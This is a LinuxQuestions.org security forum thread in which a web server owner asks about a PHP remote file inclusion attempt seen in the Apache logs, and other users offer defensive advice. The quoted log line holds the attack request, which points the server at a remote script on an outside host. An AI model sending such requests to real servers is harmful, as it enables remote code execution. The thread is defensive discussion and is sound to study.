LinuxQuestions.org
Register a domain and help support LQ
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 12-11-2008, 08:56 AM   #1
spycxamaican
LQ Newbie
 
Registered: Feb 2008
Location: Toronto, Canada
Distribution: open suse
Posts: 7

Rep: Reputation: 0
Question possible hack attack?


I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - 80.67.23.3 - - [10/Dec/2008:06:13:24 -0500] "GET /phpproj/catalog/includes/include_once.php?include_file=http://www.jkijmond.nl/jl/response.txt%0D?? HTTP/1.1" 404 1056 "-" repeated 4 times. Just the time and date are different. I copied response.txt to my web server and ran it. This is what was displyed:
Osirys
uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers) 0sirys was here ..
uname -a: Linux zombie13 2.6.22.19-0.1-default #1 SMP 2008-10-14 22:17:43 +0200 x86_64
os: Linux
id: uid=30(wwwrun) gid=8(www) groups=8(www),111(vboxusers)
free: 5.13 Gb
used: 44.13 Gb
total: 49.26 Gb

Does this information present a security risk? If so what may be done to prevent attacks using this information.

I have blocked the ip range 80.67.23.0 - 80.67.23.255 to prevent further attempts coming from domainfactory GmbH.

TIA for your advice,

Philip
 
Old 12-11-2008, 09:30 AM   #2
malaprop
LQ Newbie
 
Registered: Dec 2008
Location: TX
Distribution: Ubuntu 8.10
Posts: 26

Rep: Reputation: 15
It's a PHP remote upload exploit. I can't seem to find much else about it, but I didn't look very long.
 
Old 01-08-2009, 10:36 AM   #3
lylemwood
Member
 
Registered: Jan 2008
Location: Toronto, Canada
Distribution: Slackware, CentOS
Posts: 47

Rep: Reputation: 18
Hey spycxamaican,

I suppose the first thing that security geeks like me ask is, is it necessary for you to support file uploads on your server?

Any services that are not ESSENTIAL to operation should be disabled on a public-facing box.

Also, are you running the latest versions of both Apache AND PHP? (I mean that when you check your distro's update-manager you find no updates necessary.)

These zombie-makers come out of the woodwork from time to time and it's necessary to deal with them ONLY when they can affect a service you need. If you don't need it, just disable the service and update.

Thanks and HTH,

Lyle
 
Old 01-08-2009, 12:36 PM   #4
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157Reputation: 157
http://www.jkijmond.nl is now fixed. Usually, such sites are compromised (where the owner is unaware) and hosting/serving malware as third party.

I'm sure you'll see tons of such traffic in your logs (I do). As long as you know that you don't allow uploads, you're ok (but check from time to time anyways).

Oh, and one thing I'd NEVER do is download questionable code and execute it, especially without viewing and assessing the code first. Fortunately, it appears that that script was just gathering data. Someone who may be keeping a list of possible hosts to attack could use that type of data.

Last edited by unixfool; 01-08-2009 at 12:41 PM.
 
Old 01-11-2009, 07:44 PM   #5
spycxamaican
LQ Newbie
 
Registered: Feb 2008
Location: Toronto, Canada
Distribution: open suse
Posts: 7

Original Poster
Rep: Reputation: 0
Thnk you for your feedback

Quote:
Originally Posted by spycxamaican View Post
I run a web server on my opensuse 10.x box and check access_log and error_log frequently. Today I found this entry - ....

Does this information present a security risk? If so what may be done to ...

I have blocked the ip range 80.67.23.0 - 80.67.23.255 to prevent further ...

TIA for your advice,

Philip
Hi everyone,

Thank you for your feedback. Currently, I do not allow file uploads. Updates are done regularly, i.e. when I am notified updates are available. One discovery is my current router does not allow me to block specific ip addresses or ip ranges. The one that allows me to do that blocks my VOIP phone line.

Now that I am learning to create web sites with PHP and MySQL file uploads may be allowed in the future. My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input etc.

Again, thank you for your feedback.

Philip
 
Old 01-12-2009, 03:39 PM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,987
Blog Entries: 54

Rep: Reputation: 2742Reputation: 2742Reputation: 2742Reputation: 2742Reputation: 2742Reputation: 2742Reputation: 2742Reputation: 2742Reputation: 2742Reputation: 2742Reputation: 2742
Quote:
Originally Posted by spycxamaican View Post
My research has found specific PHP code that should enhance the security of my PHP scripts to prevent XSS, invalid input etc.
Post a pointer to what you found?

BTW, if you're researching PHP security please look up Snort, Suhosin, PHP IDS and mod_security. And remember security is multi-layered and a continuous process.
 
Old 01-13-2009, 10:47 AM   #7
lylemwood
Member
 
Registered: Jan 2008
Location: Toronto, Canada
Distribution: Slackware, CentOS
Posts: 47

Rep: Reputation: 18
Howdy again, I just got another update email for this post and I re-read from the beginning...

Notwithstanding the fact that, ultimately, this may be originating at some zombie attempting an upload exploit, remember the critical element here... The response code: 404 (Your server told it to piss off)

Natually, zombies just roam through the web tapping everybody's door to see who was dumb enough to leave the key in the lock outside. I've had one server running three virtual hosts and they each have an entry in their log (after only one day of operating!!!) from some "Morpheus F**king Scanner" (no joke, that was the actual text in the log) zombie.

But the response codes are all 404s so there's no risk to me.

Keep patched, disable unnecessary services, and keep an eye on those logs for things that DON'T go 404...

Oh, and as unSpawn asked, please do submit any tweaks you have for scripting security, etc.

Excellent posting, btw, everyone, this is one of the first security-related threads I've seen that DIDN'T go all crazy with advice to block everyone's ip and start wearing foil hats.
 
Old 01-13-2009, 01:57 PM   #8
spycxamaican
LQ Newbie
 
Registered: Feb 2008
Location: Toronto, Canada
Distribution: open suse
Posts: 7

Original Poster
Rep: Reputation: 0
Thanks for the heads up

Quote:
Originally Posted by unSpawn View Post
Post a pointer to what you found?

BTW, if you're researching PHP security please look up Snort, Suhosin, PHP IDS and mod_security. And remember security is multi-layered and a continuous process.
This site is very helpful -Virginia Tech (http://www.hosting.vt.edu/tutorials/phpmysql/). However, the more advanced features in this tutorial will only work when all required apache, php and mysql modules are installed.

Thank for the heads up regarding security. This is why I am taking things slowly, building the web aps with security in mind while researching the security issues involved hosting on a public facing serve.

Philip
 
  


Reply

Tags
hack


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
someone trying to hack me? drauk Slackware 31 07-20-2008 07:15 AM
LXer: Hack Attack : Run Linux Apps Natively On Windows, OSX LXer Syndicated Linux News 0 03-23-2008 09:50 PM
Tools to hack/attack windows ErEn Linux - Security 1 01-10-2008 08:45 PM
hack ?help me !! liumang Linux - Security 10 11-28-2004 04:21 AM
what the hack is this? doublefailure Linux - Security 13 04-24-2003 12:23 PM


All times are GMT -5. The time now is 07:14 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration